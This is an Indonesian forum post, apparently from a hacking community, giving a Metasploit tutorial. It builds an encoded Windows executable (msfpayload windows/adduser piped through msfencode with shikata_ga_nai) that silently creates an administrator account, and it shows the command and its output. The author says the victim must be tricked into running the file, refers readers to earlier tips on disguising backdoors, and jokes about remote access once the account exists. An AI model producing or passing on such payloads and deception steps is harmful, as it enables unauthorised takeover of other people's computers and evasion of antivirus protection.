add user administrator windows dengan metasploit
#1
ok kembali lagi bersama saya , zee eichel yang lumayan ganteng ..hahaha. Moga-moga teman-teman tidaklah bosan mengunjungi blog saya yang cupu ini. Tongue . Untuk kesempatan share kali ini, saya akan berbagi masalah metasploit. Kali ini kita akan membuat program exe, yang nantinya akan membuat user administrator pada windows. Gimana, lumyan keren kan,.. hehehe. Ane membuat backdoor ini menggunakan backtrack 5 versi gnome.. ya bagi teman2 yang memakai metasploit pada windows bisa juga kok ..

ya udah langsung aja yak…

Pertama-tama kita buka directory dimana framework3 berada ..

root@zee-IBTeam:/pentest/exploits/framework2# cd /pentest/exploits/framework3

Nah kalo sudah teman-teman tinggal memasukan perintah ini..

root@zee-IBTeam:/pentest/exploits/framework3# ./msfpayload windows/adduser pass=coba user=ibt r | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o addinguser.exe


ket :
pass=”password account buatan anda” (tanpa tanda kutip dan spasi )
user=”Nama user administrator buatan anda” ( tanpa tanda kutip dan spasi )
addinguser.exe = nama file exenya ( bisa di ganti sesuai kehendak anda )


nah enter deh…

root@zee-IBTeam:/pentest/exploits/framework3# ./msfpayload windows/adduser pass=coba user=ibt r | ./msfencode -t exe -e x86/shikata_ga_nai -c 10 -o addinguser.exe
[*] x86/shikata_ga_nai succeeded with size 294 (iteration=1)

[*] x86/shikata_ga_nai succeeded with size 321 (iteration=2)

[*] x86/shikata_ga_nai succeeded with size 348 (iteration=3)

[*] x86/shikata_ga_nai succeeded with size 375 (iteration=4)

[*] x86/shikata_ga_nai succeeded with size 402 (iteration=5)

[*] x86/shikata_ga_nai succeeded with size 429 (iteration=6)

[*] x86/shikata_ga_nai succeeded with size 456 (iteration=7)

[*] x86/shikata_ga_nai succeeded with size 483 (iteration=8)

[*] x86/shikata_ga_nai succeeded with size 510 (iteration=9)

[*] x86/shikata_ga_nai succeeded with size 537 (iteration=10)


Nah pada kasus ini korban harus mengesekusi file.exe tersebut.. ya tinggal dituntut kreativitas teman-teman bagaimana sampai hal itu dapat terjadi. Banyak trik yang sudah saya paparkan untuk membuat penyamaran backdoor serta tipu muslihat exe untuk windows.. makanya sering2 lah membaca artikel2 saya sebelumnya .. hehehe

Penampakan pada windows ..

[Image: 2n8yob9.jpg?w=497&h=369]

w0w kk w0w .. sudah terbentuk user adminstrator buatan .. klo windows tersebut membuka layanan remote.. wah gk tau ane dah jadi apa .. ahhahaha

[Image: 21oomxl.jpg?w=497&h=363]

moga berguna buat teman2 sekalian :apn::apn:
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only






Users browsing this thread: 2 Guest(s)